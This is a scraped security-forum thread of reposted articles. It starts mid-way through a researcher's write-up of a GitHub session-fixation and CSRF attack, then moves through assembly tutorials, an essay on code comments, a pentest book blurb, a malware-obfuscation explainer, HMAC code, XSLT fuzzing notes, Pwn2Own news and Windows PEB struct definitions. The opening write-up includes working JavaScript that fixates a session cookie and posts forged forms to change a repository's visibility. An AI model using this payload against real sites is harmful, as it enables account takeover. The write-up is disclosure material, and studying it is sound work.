:_csrf_token=>"ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="} on a subdomain we create _gh_sess=HACKED; Domain=.github.com window.open('https://github.com'). Browser sends: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED; Server responds: Set-Cookie:_gh_sess=ORIGINAL; httponly .... This made our HACKED cookie older then freshly received ORIGINAL cookie. Repeat request: window.open('https://github.com'). Browser sends: Cookie: _gh_sess=HACKED; _gh_sess=ORIGINAL; Server response: Set-Cookie:_gh_sess=HACKED; httponly .... Voila, we fixated it in Domain=github.com httponly cookie. Now both Domain=.github.com and Domain=github.com cookies have the same HACKED value. destroy the Dropped cookie, the mission is accomplished: document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT'; Initially I was able to break login (500 error for every attempt). I had some fun on twitter. Github staff banned my repo. Then I figured out how to fixate "session_id" and "_csrf_token" (they never get refreshed if already present) It will make you a guest user (logged out) but after logging in values will remain the same. [h=2]Steps:[/h] let's choose our target. We discussed XSS-privileges problem on twitter a few days ago. Any XSS on github can do anything: e.g. open source or delete a private repo. This is bad and Pagebox technique or Domain-splitting would fix this. We don't need XSS now since we fixated the CSRF token. (CSRF attack is almost as serious as XSS. Main profit of XSS - it can read responses. CSRF is write-only). So we would like to open source github/github, thus we need a guy who can technically do this. His name is the Githubber. I send an email to the Githubber. "Hey, check out new HTML5 puzzle! http://blabla.github.com/html5_game" the Githubber opens the game and it executes the following javascript — replaces his _gh_sess with HACKED (session fixation): document.cookie='_gh_sess=BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b;Domain=.github.com;'; x=window.open('https://github.com/'); setTimeout(function(){ x2=window.open('https://github.com/'); },3000); setTimeout(function(){ x.close() && x2.close(); document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT'; //_csrf_token is ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4= //insert <script src="/done.js"> every 1 second },10000); done=function(v){ if(v){ //make repo private again }else{ //keep trying to open source } } HACKED session is user_id-less (guest session). It simply contains session_id and _csrf_token, no certain user is specified there. So the Game asks him explictely: please Star us on github (or smth like this) <link>. He may feel confused (a little bit) to be logged out. Anyway, he logs in again. user_id in session belongs to the Githubber, but _csrf_token is still ours! Meanwhile, the Evil game inserts <script src=/done.js> every 1 second. It contains done(false) by default — it means, keep submitting the form to iframe : <form target=irf action="https://github.com/github/github/opensource" method="post"> <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=" </form> At the same time every 1 second I execute on my machine: git clone git://github.com/github/github.git As soon as the repo is opensourced my clone request will be accepted. Then I change /done.js: "done(true)". This will make Evil game to submit similar form and make github/github private again: <form target=irf action="https://github.com/github/github/privatesource" method="post"> <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=" </form> the Githubber replies: "Nice game" and doesn't notice anything (github/github was open sourced for a few seconds and I cloned it). Oh, his CSRF token is still ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4= Forever. (only cookies reset will update it) btw i don't like how cookies work Fast fix — now github expires Domain=.github.com cookie, if 2 _gh_sess cookies were sent on https://github.com/*. It kills HACKED just before it becomes older than ORIGINAL. Proper fix would be using githubpages.com or another separate domain. Blogger uses blogger.com as dashboard and blogspot.com for blogs. Last time I promised to publish an OAuth security insight This time I promise to write Webkit (in)security tips in a few weeks. There are some WontFix issues I don't like (related to privacy). P.S. I reported the fixation issue privately only because I'm a good guy and was in a good mood. Responsible disclosure is way more profitable with other websites, when I get a bounty and can afford at least a beer. Perhaps, tumblr has a similar issue. I didn't bother to check Posted by Egor Homakov at 8:33 PM Sursa: Egor Homakov: Hacking Github with Webkit
  10. Some dark corners of C O prezentare care trebuie vazuta de toti programatorii C: https://docs.google.com/presentation/d/1h49gY3TSiayLMXYmRMaAEMl05FaJ-Z6jDOWOz3EsqqQ/preview?usp=sharing&sle=true#slide=id.gaf50702c_0153
  11. Practical x64 Assembly and C++ Tutorials 10:48 1 de la WhatsACreel 1,127 de vizion?ri 9:19 2 Intro, briefly how to call x64 ASM from C++ de la WhatsACreel 14,821 de vizion?ri 11:33 3 Integer data types so we're all on the same page de la WhatsACreel 3,242 de vizion?ri 9:25 4 Intro to Registers, the 8086 de la WhatsACreel 3,180 de vizion?ri 7:59 5 This one is about the 386 and 486 register sets de la WhatsACreel 2,190 de vizion?ri 12:01 6 Finally we get to our modern x64 register set de la WhatsACreel 2,334 de vizion?ri 13:13 7 We'll look at a few useful instructions today. de la WhatsACreel 2,539 de vizion?ri 11:58 8 This one is about the important debugging windows in Visual Studio 2010 Express de la WhatsACreel 4,492 de vizion?ri 12:28 9 Today we'll look at Jumps, Labels and Comparing operands. de la WhatsACreel 2,077 de vizion?ri 11:41 10 This one is how to pass integer parameters via the registers and return them in RAX de la WhatsACreel 2,229 de vizion?ri 13:20 11 Some instructions for performing boolean logic de la WhatsACreel 1,835 de vizion?ri 14:39 12 Pointers, Memory and the Load Effective Address Instruction de la WhatsACreel 2,052 de vizion?ri 9:18 13 Planning prior to programming a small but useful algorithm to Zero an array de la WhatsACreel 1,913 vizion?ri 10:12 14 This is the programming of the algorithm we went through above de la WhatsACreel 1,993 de vizion?ri 11:56 15 Intro to reserving space in the data segment de la WhatsACreel 1,438 de vizion?ri 12:57 16 This one is about 4 shift instructions, SHL, SHR, SAL and SAR de la WhatsACreel 2,362 de vizion?ri 13:54 17 We'll look at the rather strange double precision shifts SHLD and SHRD de la WhatsACreel 1,140 de vizion?ri 13:31 18 Some rotate instructions, ROL, ROR, RCL and RCR de la WhatsACreel 1,528 de vizion?ri 20:32 19 The Multiplication and Division instructions de la WhatsACreel 1,885 de vizion?ri 19:04 20 Flags register and conditional moves and jumps de la WhatsACreel 1,724 de vizion?ri 16:50 21 Addressing modes from registers and immediates to SIB pointers. de la WhatsACreel 1,775 de vizion?ri 16:04 22 Intro to image processing de la WhatsACreel 1,821 de vizion?ri 19:43 23 This is the C++ image processing one de la WhatsACreel 2,455 de vizion?ri 23:41 24 This is C++ adjust brightness de la WhatsACreel 1,346 de vizion?ri 13:14 25 This is the Assembly version of the adjust brightness algorithm de la WhatsACreel 746 de vizion?ri 23:51 26 This is the Assembly version of the adjust brightness algorithm de la WhatsACreel 1,136 de vizion?ri 22:32 27 Introduction to the stack de la WhatsACreel 3,216 vizion?ri 17:42 28 Calling a C++ function from ASM de la WhatsACreel 1,498 de vizion?ri 31:39 29 Intro to the rather daunting stack frame de la WhatsACreel 2,416 vizion?ri 16:26 30 The test instruction is a AND but doesn't set the answer in op1 de la WhatsACreel 956 de vizion?ri 18:18 31 Testing single bits from a bit array de la WhatsACreel 893 de vizion?ri 14:47 32 Many little misc. instructions de la WhatsACreel 1,046 de vizion?ri 19:40 33 Three tutorials on the string instructions de la WhatsACreel 779 de vizion?ri 17:10 34 Three tutorials on the string instructions de la WhatsACreel 598 de vizion?ri 10:54 35 Three tutorials on the string instructions de la WhatsACreel 719 vizion?ri 17:04 36 This one is on the SETcc instructions which set bytes to 1 or 0 based on a condition de la WhatsACreel 505 vizion?ri 17:39 37 We will spend some time now looking at a few algorithms for practice, this one's FindMax(int*, int) de la WhatsACreel 538 de vizion?ri 21:26 38 This one is the Euclidean Algorithm de la WhatsACreel 710 vizion?ri 12:18 39 We've finally made it through most of the regular x86 instruction set, now for something completely different de la WhatsACreel 718 vizion?ri 24:11 40 Introducing the CPUID instruction de la WhatsACreel 1,315 vizion?ri 21:36 41 A general intro to MMX and a couple of the instructions de la WhatsACreel 801 vizion?ri 18:46 42 The addition and subtraction instructions in MMX de la WhatsACreel 691 de vizion?ri 17:51 43 Multiplcation instructions in MMX de la WhatsACreel 765 de vizion?ri 20:33 44 Bit shifting in MMX de la WhatsACreel 904 vizion?ri 20:32 45 de la WhatsACreel 543 de vizion?ri 20:15 46 de la WhatsACreel 590 de vizion?ri 21:23 47 de la WhatsACreel 569 de vizion?ri 13:28 48 de la WhatsACreel 741 de vizion?ri 19:45 49 de la WhatsACreel 911 vizion?ri 29:39 50 de la WhatsACreel 961 de vizion?ri 17:18 51 de la WhatsACreel 459 de vizion?ri 30:08 52 de la WhatsACreel 342 de vizion?ri 33:59 53 de la WhatsACreel 596 de vizion?ri 21:10 54 de la WhatsACreel 411 vizion?ri 12:40 55 de la WhatsACreel 239 de vizion?ri 12:32 Playlist: http://www.youtube.com/playlist?list=PL0C5C980A28FEE68D
  12. [h=1]Yes, your code does need comments.[/h] I imagine that this post is going to draw the ire of some. It seems like every time I mention this on Twitter or anywhere else there is always some pushback from people who think that putting comments in your code is a waste of time. I think your code needs comments, but so we have a mutual understanding, lets qualify that. def somefunction(a, : #add a to b c = a + b #return the result of a + b return c I understand this is a contrived example but this is the comment trap that new developers get caught in. These types of comments really aren't useful to anyone. Peppering the code that you just wrote with excessive comments, especially when it is abundantly clear what the code is doing, is the least useful type of comment you can write. "Code is far better describing what code does than English, so just write clear code" This is usually the blowback you get from comments like the ones above. I don't disagree, programming languages are definitely more precise than English. What I don't agree with is the idea that if the code is clear and understandable that comments are unneeded or don't have a place in modern software development. So knowing this, what kind of comments am I advocating for? I'm advocating for comments as documentation. Comments that explain what a complex piece of code does, and most importantly what an entire function or Class does and why they exist in the first place. So what is a good example of the kind of documentation I am talking about? I think Zed Shaw's Lamson is a fantastic example of this. Here is a code excerpt from that: class Relay(object): """ Used to talk to your "relay server" or smart host, this is probably the most important class in the handlers next to the lamson.routing.Router. It supports a few simple operations for sending mail, replying, and can log the protocol it uses to stderr if you set debug=1 on __init__. """ def __init__(self, host='127.0.0.1', port=25, username=None, password=None, ssl=False, starttls=False, debug=0): """ The hostname and port we're connecting to, and the debug level (default to 0). Optional username and password for smtp authentication. If ssl is True smtplib.SMTP_SSL will be used. If starttls is True (and ssl False), smtp connection will be put in TLS mode. It does the hard work of delivering messages to the relay host. """ self.hostname = host self.port = port self.debug = debug self.username = username self.password = password self.ssl = ssl self.starttls = starttls ... This code snippet is from https://github.com/zedshaw/lamson/blob/master/lamson/server.py. You can poke around the lamson code and see some good looking Python code but also some usefully documented code. [h=2]So hold on. Why are we writing comments?[/h] Why are we writing comments, if you write clean, understandable code? Why do we need to explain what classes and functions do if the code is "clear" and easy to understand. In my opinion, we write comments to capture intent. Comments are the only way to capture the intent of the code at the time of writing. Looking at a block of code only allows you to understand the intent of that particular code at that moment in time which may be very different then the intent of the code at time of its original writing. [h=2]Writing comments captures intent.[/h] Writing comments captures the original meaning of the code. Python has docstrings for this, other languages have comparable options. What is so good about docstring type comments? In conjunction with unambiguous class and function names they can easily describe the original intent of your code. Why is capturing the original intent of your code important? It allows a developer, at a glance, to look at a piece of code and know why it exists. It reduces situations where a piece of codes original intent isn't clear then gets modified and leads to unintended regressions. It reduces the amount of context a developer must hold his/her mind to solve any particular problem that may be contained in a piece of code. Writing comments to capture intent is like writing tests to prove that your software does what is expected. [h=2]Where do we go from here?[/h] The first step is to realize that the documentation/comments accompanying a piece of code can be just important as the code itself and need to be maintained as such. Just like code can become stale if you don't keep it updated so do comments. If you update some code you must update the accompanying comments/documentation or they become useless and can lead to more developer error then not having comments at all. So we have to treat comments and documentation as first class citizens. Next we have to agree on what is important to comment on in your code, and how to structure your code to make your use of comments most effective. Most of this relies on your own judgement but we can cover most issues with some steadfast rules. Never name your classes and functions ambiguously. Always use inline comments on code blocks that are complicated or may appear unclear. Always use descriptive variable names. Always write comments describing the intent or reason why a piece of code exists. Always keep comments up to date when editing commented code. As you can see from the points above code as documentation and comments as documentation are not mutually exclusive. Both are necessary to create readable code that is easily maintained by you and future maintainers. Sursa: Yes, your code does need comments. - Mike Grouchy
  13. BackTrack 5 Cookbook Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5 Willie Pritchett David De Smet Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5 - Learn to perform penetration tests with BackTrack 5 - Nearly 100 recipes designed to teach penetration testing principles and build knowledge of BackTrack 5 Tools - Provides detailed step-by-step instructions on the usage of many of BackTrack's popular and not-so- popular tools In Detail BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm. "BackTrack 5 Cookbook" provides you with practical recipes featuring many popular tools that cover the basics of a penetration test: information gathering, vulnerability identification, exploitation, priviledge escalation, and covering your tracks. The book begins by covering the installation of BackTrack 5 and setting up a virtual environment to perform your tests. We then dip into recipes involving the basic principles of a penetration test such as information gathering, vulnerability identification, and exploitation. You will further learn about privilege escalation, radio network analysis, Voice over IP, Password cracking, and BackTrack forensics. "BackTrack 5 Cookbook" will serve as an excellent source of information for the security professional and novice alike. What will you learn from this book: - Install and set up BackTrack 5 on multiple platforms - Customize BackTrack to fit your individual needs - Exploit vulnerabilities found with Metasploit - Locate vulnerabilities Nessus and OpenVAS - Provide several solutions to escalate privileges on a compromised machine - Learn how to use BackTrack in all phases of a penetration test - Crack WEP/WPA/WPA2 Encryption - Learn how to monitor and eavesdrop on VOIP networks Download: https://cdn.anonfiles.com/1358842982481.pdf Sursa: Data 4 Instruction: BackTrack 5 Cookbook
  14. Obfuscation: Malware’s best friend By Joshua Cannell March 8, 2013 In Malware Intelligence Here at Malwarebytes, we see a lot of malware. Whether it’s a botnet used to attack web servers or a ransomware stealing your files, much of today’s malware wants to stay hidden during infection and operation to prevent removal and analysis. Malware achieves this using many techniques to thwart detection and analysis—some examples of these include using obscure filenames, modifying file attributes, or operating under the pretense of legitimate programs and services. In more advanced cases, the malware might attempt to subvert modern detection software (i.e. MBAM) to prevent being found, hiding running processes and network connections. The possibilities are quite endless.Despite advances in modern malware, dirty programs can’t hide forever. When malware is found, it needs some additional layers of defense to protect itself from analysis and reverse engineering. By implementing additional protection mechanisms, malware can be more difficult to detect and even more resilient to takedown. Although a lot of tricks are used to hide malware’s internals, a technique used in nearly every malware is binary obfuscation.Obfuscation (in the context of software) is a technique that makes binary and textual data unreadable and/or hard to understand. Software developers sometimes employ obfuscation techniques because they don’t want their programs being reverse-engineered or pirated.Its implementation can be as simple as a few bit manipulations and advanced as cryptographic standards (i.e. DES, AES, etc). In the world of malware, it’s useful to hide significant words the program uses (called “strings”) because they give insight into the malware’s behavior. Examples of said strings would be malicious URLs or registry keys. Sometimes the malware goes a step further and obfuscates the entire file with a special program called a packer.Let’s see some practical obfuscation examples used in a lot of malware today. Scenario 1: The exclusive or operation (XOR) The exclusive or operation (represented as XOR) is probably the most commonly used method of obfuscation. This is because it is very easy to implement and easily hides your data from untrained eyes. Consider the following highlighted data. Obfuscated data is unreadable in its current form. In its current form, the data is unreadable. But when we apply an XOR value of 0×55, we see something else entirely. An XOR operation using 0×55 reveals a malicious URL. Now we have our malicious URL. Looks like this malware contacts “ http://tator1157.hostgator.com” to retrieve the file “bot.exe”.This form of obfuscation is typically very easy to defeat. Even if you don’t have the XOR key, programs exist to manually cycle through every possible single-byte XOR value in search of a particular string. One popular tool available on both UNIX and Window platforms is XORSearch written by Didier Stevens. This tool searches for strings encoded in multiple formats, including XOR.Because malware authors know programs like these exist, they implement tricks of their own to avoid detection. One thing they might do is a two-cycle approach, performing an XOR against data with a particular value and then making a second pass with another value. A separate technique (although equally effective) commonly used is to increment the XOR value in a loop. Using the previous example, we could XOR the letter ‘h’ with 0×55, then the letter ‘t’ with 0×56, and so on. This would also defeat common XOR detection programs.Scenario 2: Base64 encodingBase64 encoding has been used for a long time to transfer binary data (machine code) over a system that only handles text. As the name suggests, its encoding alphabet contains 64 characters, with the equal sign (=) used as a padding character. The alphabet contains the characters A-Z, a-z, 0-9, + and /. Below is an example of some encoded text representing the string pointing to the svchost.exe file, used by Windows to host services. Base64 is commonly used in malware to disguise text strings. While the encoded output is completely unreadable, base64 encoding is easier to identify than a lot of encoding schemes, usually because of its padding character. There are a lot of tools that can perform base64 encode/decode functions, both online and via downloaded programs.Because base64 encoding is so easy to overcome, malware authors usually take things a step further and change the order of the base64 alphabet, which breaks standard decoders. This allows for a custom encoding routine that is more difficult to break. Scenario 3: ROT13 Perhaps the most simple of the three techniques that’s commonly used is ROT13. ROT is an ASM instruction for “rotate”, hence ROT13 would mean “rotate 13”. ROT13 uses simple letter substitution to achieve obfuscated output.Let’s start by encoding the letter ‘a’. Since we’re rotating by thirteen, we count the next thirteen letters of the alphabet until we land at ‘n’. That’s really all there is to it! ROT13 uses a simple letter substitution to jumble text. The above image shows a popular registry key used to list programs that run each time a user logs in. ROT13 can also be modified to rotate a different number of characters, like ROT15. Scenario 4: Runtime packers In a lot of cases, the entire malware program is obfuscated. This prevents anybody from viewing the malware’s code until it is placed in memory.This type of obfuscation is achieved using what’s known as a packer program. A packer is piece of software that takes the original malware file and compresses it, thus making all the original code and data unreadable. At runtime, a wrapper program will take the packed program and decompress it in memory, revealing the program’s original code.Packers have been used for a long time for legitimate purposes, some of which include reducing file sizes and protecting against piracy. They help conceal vital program components and deter novice program crackers.Fortunately, we aren’t without help when it comes to identifying and unpacking these files. There are many programs available that detect commercial packers, and also advise on how to unpack. Some examples of these file scanners are Exeinfo PE and PEID (no longer developed, but still available for download). Exeinfo PE is a great tool for detecting common packers. However, as you might expect, the situation can get more complicated. Malware authors like to create custom packers to prevent less-experienced reverse engineers from unpacking their malware’s contents. This approach defeats modern unpacking scripts, and forces reversers to manually unpack the file and see what the program is doing. Even rarer, sometimes malware authors will twice-pack their files, first with a commercial packer and then their own custom packer. Conclusion While this list of techniques is certainly not exhaustive, hopefully this has provided a better understanding of how malware hides itself from plain sight. Obfuscation is a highly reliable technique that’s used to hide file contents, and sometimes the entire file itself if using a packer program.Obfuscation techniques are always changing, but rest assured knowing we at Malwarebytes are well-aware of this. Our staff has years of experience in fighting malware, and goes to great lengths to see what malicious files are really doing.Bring it on, malware. Do your worst! Sursa: Obfuscation: Malware’s best friend | Malwarebytes Unpacked
  15. Nytro

    Hmac md5/sha1

    [h=1]HMAC MD5/SHA1[/h] Author: [h=3]RosDevil[/h]Hi people, this is a correct usuage of windows' WINCRYPT Apis to peform HMAC MD5/SHA1 The examples shown on msdn aren't correct and have some bugs, so i decided to share a correct example. #include <iostream> #include "windows.h" #include <wincrypt.h> #ifndef CALG_HMAC #define CALG_HMAC (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HMAC) #endif #ifndef CRYPT_IPSEC_HMAC_KEY #define CRYPT_IPSEC_HMAC_KEY 0x00000100 #endif #pragma comment(lib, "crypt32.lib") using namespace std; char * HMAC(char * str, char * password, DWORD AlgId); typedef struct _my_blob{ BLOBHEADER header; DWORD len; BYTE key[0]; }my_blob; int main(int argc, _TCHAR* argv[]) { char * hash_sha1 = HMAC("ROSDEVIL", "password", CALG_SHA1); char * hash_md5 = HMAC("ROSDEVIL", "password", CALG_MD5); cout<<"Hash HMAC-SHA1: "<<hash_sha1<<" ( "<<strlen(hash_sha1)<<" )"<<endl; cout<<"Hash HMAC-MD5: "<<hash_md5<<" ( "<<strlen(hash_md5)<<" )"<<endl; cin.get(); return 0; } char * HMAC(char * str, char * password, DWORD AlgId = CALG_MD5){ HCRYPTPROV hProv = 0; HCRYPTHASH hHash = 0; HCRYPTKEY hKey = 0; HCRYPTHASH hHmacHash = 0; BYTE * pbHash = 0; DWORD dwDataLen = 0; HMAC_INFO HmacInfo; int err = 0; ZeroMemory(&HmacInfo, sizeof(HmacInfo)); if (AlgId == CALG_MD5){ HmacInfo.HashAlgid = CALG_MD5; pbHash = new BYTE[16]; dwDataLen = 16; }else if(AlgId == CALG_SHA1){ HmacInfo.HashAlgid = CALG_SHA1; pbHash = new BYTE[20]; dwDataLen = 20; }else{ return 0; } ZeroMemory(pbHash, sizeof(dwDataLen)); char * res = new char[dwDataLen * 2]; my_blob * kb = NULL; DWORD kbSize = sizeof(my_blob) + strlen(password); kb = (my_blob*)malloc(kbSize); kb->header.bType = PLAINTEXTKEYBLOB; kb->header.bVersion = CUR_BLOB_VERSION; kb->header.reserved = 0; kb->header.aiKeyAlg = CALG_RC2; memcpy(&kb->key, password, strlen(password)); kb->len = strlen(password); if (!CryptAcquireContext(&hProv, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL,CRYPT_VERIFYCONTEXT | CRYPT_NEWKEYSET)){ err = 1; goto Exit; } if (!CryptImportKey(hProv, (BYTE*)kb, kbSize, 0, CRYPT_IPSEC_HMAC_KEY, &hKey)){ err = 1; goto Exit; } if (!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHmacHash)){ err = 1; goto Exit; } if (!CryptSetHashParam(hHmacHash, HP_HMAC_INFO, (BYTE*)&HmacInfo, 0)){ err = 1; goto Exit; } if (!CryptHashData(hHmacHash, (BYTE*)str, strlen(str), 0)){ err = 1; goto Exit; } if (!CryptGetHashParam(hHmacHash, HP_HASHVAL, pbHash, &dwDataLen, 0)){ err = 1; goto Exit; } ZeroMemory(res, dwDataLen * 2); char * temp; temp = new char[3]; ZeroMemory(temp, 3); for (unsigned int m = 0; m < dwDataLen; m++){ sprintf(temp, "%2x", pbHash[m]); if (temp [1] == ' ') temp [1] = '0'; // note these two: they are two CORRECTIONS to the conversion in HEX, sometimes the Zeros are if (temp [0] == ' ') temp [0] = '0'; // printed with a space, so we replace spaces with zeros; (this error occurs mainly in HMAC-SHA1) sprintf(res,"%s%s", res,temp); } delete [] temp; Exit: free(kb); if(hHmacHash) CryptDestroyHash(hHmacHash); if(hKey) CryptDestroyKey(hKey); if(hHash) CryptDestroyHash(hHash); if(hProv) CryptReleaseContext(hProv, 0); if (err == 1){ delete [] res; return ""; } return res; } //Note: using HMAC-MD5 you could perform the famous CRAM-MD5 used to authenticate //smtp servers. Sursa: HMAC MD5/SHA1 - rohitab.com - Forums
  16. [h=2]lundi 25 février 2013, 17:26:37 (UTC+0100)[/h] [h=3]Mutation-based fuzzing of XSLT engines[/h] Intro I did in 2011 some research about vulnerabilities caused by the abuse of dangerous features provided by XSLT engines. This leads to a few vulnerabilities (mainly access to the file system or code execution) in Webkit, xmlsec, SharePoint, Liferay, MoinMoin, PostgreSQL, ... In 2012, I decided to look for memory corruption bugs and did some mutation-based (aka "dumb") fuzzing of XSLT engines. This article presents more than 10 different PoC affecting Firefox, Adobe Reader, Chrome, Internet Explorer and Intel SOA. Most of these bugs have been patched by their respective vendors. The goal of this blog-post is mainly to show to XML newbies what pathological XSLT looks like. Of course, exploit writers could find some useful information too. When fuzzing XSLT engines by providing malformed XSLT stylesheets, three distinct components (at least) are tested: - the XML parser itself, as a XSLT stylesheet is a XML document - the XSLT interpreter, which need to compile and execute the provided code - the XPath engine, because attributes like "match" and "select" use it to reference data Given that dumb fuzzing is used, the generation of test cases is quite simple. Radamsa generates packs of 100 stylesheets from a pool of 7000 grabbed here and there. A much improved version (using among others grammar-based generation) is on the way and already gives promising results ;-) PoC were minimized manually, given that the template structure and execution flow of XSLT doesn't work well with minimizers like tmin or delta. Intel SOA Expressway XSLT 2.0 Processor Intel was proposing an evaluation version of their XSLT 2.0 engine. It's quite rare to encounter a C-based XSLT engine supporting version 2.0, so it was added to the testbed even if it has minor real-world relevance. In my opinion, the first bug should have been detected during functionnal testing. When idiv (available in XPath 2.0) is used with 1 as the denominator, a optimization/shortcut is used. But it seems that someone has confused the address and the value of the corresponding numerator variable. Please note that the value of the numerator corresponds to 0x41424344 in hex. Articol: http://www.agarri.fr/blog/index.html
  17. Cateva idei: https://docs.google.com/file/d/0B46UFFNOX3K7bl8zWmFvRGVlamM/view?pli=1&sle=true
  18. E de cacat. Linux, Android, iOS, MAC OS X Firefox OS, Chrome OS te pun sa selectezi browseru? Eu poate vreau Internet Explorer p Linux, cu Wine, vreau sa ma puna sa aleg!
  19. Nu isi merita banii, nimic special...
  20. La cat de complicate sunt lucrurile si banii sunt pe masura. Conteaza insa si cum colaboreaza companiile. CEO-ul de la VUPEN (cei mai smecheri in domeniul "exploit development" dupa parerea mea) a declarat ca Microsoft nu mai vrea sa le cumpere 0day-urile (cel din IE10 pe Win8) si in concluzie acestea vor ajunge la guverne. Ceea cea nu e deloc ok.
  21. [h=1]Major Browsers, Java Hacked on the First Day of Pwn2Own 2013[/h]March 7th, 2013, 14:04 GMT · By Eduard Kovacs Considering the large amounts of money being offered at Pwn2Own 2013, we shouldn’t be surprised that most of the web browsers have been hacked on the first day of the competition, held these days in Canada as part of the CanSecWest conference. So far, Firefox, Internet Explorer 10, Java and Chrome have been broken by the contestants. French security firm VUPEN announced breaking Internet Explorer 10 on Windows 8, Firefox 19 on Windows 7, and Java. “We've pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass,” VUPEN wrote on Twitter. “We've pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP,” the company said two hours later. It appears they hacked Java by leveraging a “unique heap overflow as a memory leak to bypass ASLR and as a code execution.” “ALL our 0days & techniques used at #Pwn2own have been reported to affected software vendors to allow them issue patches and protect users,” VUPEN said. Experts from MWR Labs have managed to demonstrate a full sandbox bypass exploit against the latest stable version of Chrome. “By visiting a malicious webpage, it was possible to exploit a vulnerability which allowed us to gain code execution in the context of the sandboxed renderer process,” MWR Labs representatives wrote. “We also used a kernel vulnerability in the underlying operating system in order to gain elevated privileges and to execute arbitrary commands outside of the sandbox with system privileges.” Java was also “pwned” by Josh Drake of Accuvant Labs and James Forshaw of Contextis. Currently, VUPEN is working on breaking Flash, Pham Toan is attempting to hack Internet Explorer 10, and the famous George Hotz is taking a crack at Adobe Reader. Sursa: Major Browsers, Java Hacked on the First Day of Pwn2Own 2013 - Softpedia
  22. [h=2]Evolution of Process Environment Block (PEB)[/h]March 2, 2013 / ReWolf Over one year ago I’ve published unified definition of PEB for x86 and x64 Windows (PEB32 and PEB64 in one definition). It was based on PEB taken from Windows 7 NTDLL symbols, but I was pretty confident that it should work on other versions of Windows as well. Recently someone left a comment under mentioned post: “Good, but its only for Windows 7?. It made me curious if it is really ‘only for Win7?. I was expecting that there might be some small differences between some field names, or maybe some new fields added at the end, but the overall structure should be the same. I’ve no other choice but to check it myself. I’ve collected 108 different ntdll.pdb/wntdll.pdb files from various versions of Windows and dumped _PEB structure from them (Dia2Dump ftw!). Here are some statistics: _PEB was defined in 80 different PDBs (53 x86 PEBs and 27 x64 PEBs) There was 11 unique PEBs for x86, and 8 unique PEBs for x64 (those numbers doesn’t sum up, as starting from Windows 2003 SP1 there is always match between x86 and x64 version) The total number of collected different _PEB definitions is equal to 11 I’ve put all the collected informations into nice table (click the picture to open PDF): PEB Evolution PDF Left column of the table represents x86 offset, right column is x64 offset, green fields are supposed to be compatible across all windows versions starting from XP without any SP and ending at Windows 8 RTM, red (pink?, rose?) fields should be used only after careful verification if they’re working on a target system. At the top of the table, there is row called NTDLL TimeStamp, it is not timestamp from the PE header but from Debug Directory (IMAGE_DIRECTORY_ENTRY_DEBUG, LordPE can parse this structure). I’m using this timestamp as an unique identifier for NTDLL version, this timestamp is also stored in PDB files. Now I can answer initial question: “Is my previous PEB32/PEB64 definition wrong ?” Yes and No. Yes, because it contains various fields specific for Windows 7 thus it can be considered as wrong. No, because most of fields are exactly the same across all Windows versions, especially those fields that are usually used in third party software. To satisfy everyone, I’ve prepared another version of PEB32/PEB64 definition: #pragma pack(push) #pragma pack(1) template <class T> struct LIST_ENTRY_T { T Flink; T Blink; }; template <class T> struct UNICODE_STRING_T { union { struct { WORD Length; WORD MaximumLength; }; T dummy; }; T _Buffer; }; template <class T, class NGF, int A> struct _PEB_T { union { struct { BYTE InheritedAddressSpace; BYTE ReadImageFileExecOptions; BYTE BeingDebugged; BYTE _SYSTEM_DEPENDENT_01; }; T dummy01; }; T Mutant; T ImageBaseAddress; T Ldr; T ProcessParameters; T SubSystemData; T ProcessHeap; T FastPebLock; T _SYSTEM_DEPENDENT_02; T _SYSTEM_DEPENDENT_03; T _SYSTEM_DEPENDENT_04; union { T KernelCallbackTable; T UserSharedInfoPtr; }; DWORD SystemReserved; DWORD _SYSTEM_DEPENDENT_05; T _SYSTEM_DEPENDENT_06; T TlsExpansionCounter; T TlsBitmap; DWORD TlsBitmapBits[2]; T ReadOnlySharedMemoryBase; T _SYSTEM_DEPENDENT_07; T ReadOnlyStaticServerData; T AnsiCodePageData; T OemCodePageData; T UnicodeCaseTableData; DWORD NumberOfProcessors; union { DWORD NtGlobalFlag; NGF dummy02; }; LARGE_INTEGER CriticalSectionTimeout; T HeapSegmentReserve; T HeapSegmentCommit; T HeapDeCommitTotalFreeThreshold; T HeapDeCommitFreeBlockThreshold; DWORD NumberOfHeaps; DWORD MaximumNumberOfHeaps; T ProcessHeaps; T GdiSharedHandleTable; T ProcessStarterHelper; T GdiDCAttributeList; T LoaderLock; DWORD OSMajorVersion; DWORD OSMinorVersion; WORD OSBuildNumber; WORD OSCSDVersion; DWORD OSPlatformId; DWORD ImageSubsystem; DWORD ImageSubsystemMajorVersion; T ImageSubsystemMinorVersion; union { T ImageProcessAffinityMask; T ActiveProcessAffinityMask; }; T GdiHandleBuffer[A]; T PostProcessInitRoutine; T TlsExpansionBitmap; DWORD TlsExpansionBitmapBits[32]; T SessionId; ULARGE_INTEGER AppCompatFlags; ULARGE_INTEGER AppCompatFlagsUser; T pShimData; T AppCompatInfo; 